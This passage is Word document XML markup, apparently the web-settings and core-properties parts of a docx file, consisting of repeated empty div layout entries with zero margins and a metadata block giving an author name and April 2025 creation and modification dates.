              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="198247999">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1782995999">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1149712269">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1135685101">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="915169263">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="682826663">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1442843774">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="706494363">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="941912979">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1888105890">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1937441331">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1900704680">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="673995692">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1587112399">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1699500617">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1232540762">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1607350168">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1213034940">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1472792345">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1941646513">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1163356072">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="878476013">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="22245480">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1162504698">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="902328341">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="692730812">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1519395382">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="2144881210">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1039092778">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1605843681">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="185441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5756">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1246113913">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1830360233">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1857386327">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="213509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2195</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Gichane</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Angela Gichane</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-04-24T15:42:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-04-24T16:26:00Z</dcterms:modified>
</cp:coreProperties>
</file>